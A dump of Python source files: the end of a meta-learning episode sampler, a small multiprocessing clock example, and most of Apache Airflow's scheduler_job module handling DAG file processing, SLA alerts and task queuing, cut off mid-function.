else: # use rr approxmation (this one is faster)
w = stats.get_w_target_rr(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
support['w_target'] = w.detach()
query['w_target'] = w.detach()
support['is_support'] = True
query['is_support'] = False
yield support, query
def worker(self, done_queue):
'''
Generate one task (support and query).
Store into self.support[self.cur] and self.query[self.cur]
'''
while True:
if done_queue.qsize() > 100:
time.sleep(1)
continue
# sample ways
sampled_classes = np.random.permutation(
self.num_classes)[:self.way]
source_classes = []
for j in range(self.num_classes):
if j not in sampled_classes:
source_classes.append(self.all_classes[j])
source_classes = sorted(source_classes)
# sample examples
support_idx, query_idx = [], []
for y in sampled_classes:
tmp = np.random.permutation(len(self.idx_list[y]))
support_idx.append(
self.idx_list[y][tmp[:self.shot]])
query_idx.append(
self.idx_list[y][
tmp[self.shot:self.shot+self.args.query]])
support_idx = np.concatenate(support_idx)
query_idx = np.concatenate(query_idx)
if self.args.mode == 'finetune' and len(query_idx) == 0:
query_idx = support_idx
# aggregate examples
max_support_len = np.max(self.data['text_len'][support_idx])
max_query_len = np.max(self.data['text_len'][query_idx])
support = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
support_idx, max_support_len)
query = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
query_idx, max_query_len)
if self.args.embedding in ['idf', 'meta', 'meta_mlp']:
# compute inverse document frequency over the meta-train set
idf = stats.get_idf(self.data, source_classes)
support['idf'] = idf
query['idf'] = idf
if self.args.embedding in ['iwf', 'meta', 'meta_mlp']:
# compute SIF over the meta-train set
iwf = stats.get_iwf(self.data, source_classes)
support['iwf'] = iwf
query['iwf'] = iwf
if 'pos' in self.args.auxiliary:
support = utils.select_subset(
self.data, support, ['head', 'tail'], support_idx)
query = utils.select_subset(
self.data, query, ['head', 'tail'], query_idx)
done_queue.put((support, query))
def __del__(self):
'''
Need to terminate the processes when deleting the object
'''
for i in range(self.num_cores):
self.p_list[i].terminate()
del self.done_queue
|
7.multiprocessing.py
|
import multiprocessing
import time
def clock(interval):
while True:
print("the time is %s" % time.ctime())
time.sleep(interval)
class ClockProcess(multiprocessing.Process):
def __init__(self, interval):
multiprocessing.Process.__init__(self)
self.interval = interval
def run(self):
while True:
print("The time is %s" % time.ctime())
time.sleep(self.interval)
# if __name__ == '__main__':
# p = ClockProcess(15)
# p.start()
if __name__ == '__main__':
p = multiprocessing.Process(target=clock, args=(15,))
print("starting processing. . . . . .:")
p.start()
print("Non blocking process..")
|
scheduler_job.py
|
# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import ExitStack, redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
import tenacity
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest, DagCallbackRequest, SlaCallbackRequest, TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of Scheduler.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with ExitStack() as exit_stack:
exit_stack.enter_context(redirect_stdout(StreamLogWriter(log, logging.INFO))) # type: ignore
exit_stack.enter_context(redirect_stderr(StreamLogWriter(log, logging.WARN))) # type: ignore
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._callback_requests
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running SchedulerJob.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis: List[TI] = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas: List[SlaMiss] = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
f"[airflow] SLA miss on DAG={dag.dag_id}",
email_content
)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def execute_callbacks(
self,
dagbag: DagBag,
callback_requests: List[CallbackRequest],
session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run,
success=not request.is_failure_callback,
reason=request.msg,
session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of serialized_dag dicts that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.read_dags_from_db = True
# Retry 'dagbag.sync_to_db()' in case of any Operational Errors
# In case of failures, provide_session handles rollback
for attempt in tenacity.Retrying(
retry=tenacity.retry_if_exception_type(exception_types=OperationalError),
wait=tenacity.wait_random_exponential(multiplier=0.5, max=5),
stop=tenacity.stop_after_attempt(settings.MAX_DB_RETRIES),
before_sleep=tenacity.before_sleep_log(self.log, logging.DEBUG),
reraise=True
):
with attempt:
self.log.debug(
"Running dagbag.sync_to_db with retries. Try %d of %d",
attempt.retry_state.attempt_number,
settings.MAX_DB_RETRIES
)
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args, **kwargs):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and is n't something a user is likely to want to
# conifugre -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(read_dags_from_db=True)
def register_exit_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self,
old_states: List[str],
new_state: str,
session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.TaskInstance.dag_run) \
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids))) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None))) # pylint: disable=no-member
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(query, of=TI,
**skip_locked(session=session)).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update({
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
})
tis_changed = session \
.query(models.TaskInstance) \
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date) \
.update(ti_prop_update, synchronize_session=False)
session.flush()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session
.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None),
DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
.limit(max_tis)
)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
